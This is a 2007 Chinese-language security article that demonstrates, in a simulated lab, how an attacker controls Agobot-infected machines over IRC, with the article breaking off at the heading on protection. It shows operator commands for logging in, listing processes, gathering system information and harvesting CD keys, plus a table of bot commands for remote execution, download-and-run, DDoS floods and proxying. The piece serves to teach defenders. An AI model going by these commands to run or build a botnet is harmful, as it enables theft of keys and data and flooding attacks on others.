安全实例:僵尸网络模型分析及解决方案
作者: 陈将, 出处:IT专家网, 责任编辑: 张帅,
2007-12-10 09:54
僵尸网络,肉鸡网络,相信很多管理员及安全工作者对其危害相当担忧,本文将通过模拟攻击环境,向用户详细介绍僵尸网络攻击的各种因素、模型分析及解决方案……
命令与控制
一旦僵尸被编辑成功,这两台测试系统就被感染了。主机已经连接上IRC服务器然后就会进入这一渠道为了能够对僵尸做出操作命令行。
主服务器和通道链接
为了对僵尸进行有效控制,授权是必须的。这一步很简单,发一个命令到通道中即可:.login FaDe dune
用户和密码授权
然后第一个僵尸被要求在被感染的计算机上运行一系列的进程:/msg FakeBot–wszyzc .pctrl.list
来自于僵尸计算机对主机的回应
然后第二台僵尸被要求寻找系统信息并且cdkeys所有的安全程序:
/msg FakeBot2–emcdnj .bot.sysinfo
/msg FakeBot2–emcdnj .harvest.cdkeys
来自于第二台僵尸计算机对主机的回应
在这一例子中,我们使用了一个很简单的功能,但是Agobot提供了很丰富的命令和功能,下表做了一些列举:
|
命令 |
描述 |
|
command.list |
List of all the available commands |
|
bot.dns |
Resolves an IP/hostname |
|
bot.execute |
Runs an .exe file on a remote computer |
|
bot.open |
打开远程计算机上的文件 |
|
bot.command |
使用系统运行命令 |
|
irc.server |
连接到IRC服务器 |
|
irc.join |
进入特定渠道 |
|
irc.privmsg |
用户发送私人信息 |
|
http.execute |
通过HTTP下载和执行文件 |
|
ftp.execute |
通过FTP下载和执行文件 |
|
ddos.udpflood |
开始UDP洪量攻击 |
|
ddos.synflood |
开始Syn洪量攻击 |
|
ddos.phaticmp |
开始PHATicmp洪量攻击 |
|
redirect.http |
开始HTTP代理 |
|
redirect.socks |
开启SOCKS4代理 |
|
pctrl.list |
进程清单 |
|
pctrl.kill |
终止程序 |
表二 Agobot的一些命令
如何保护你的计算机
以下,我们将阐述如何从用户和管理员两个维度有效的防止僵尸的感染及其攻击
- 本文关键词:
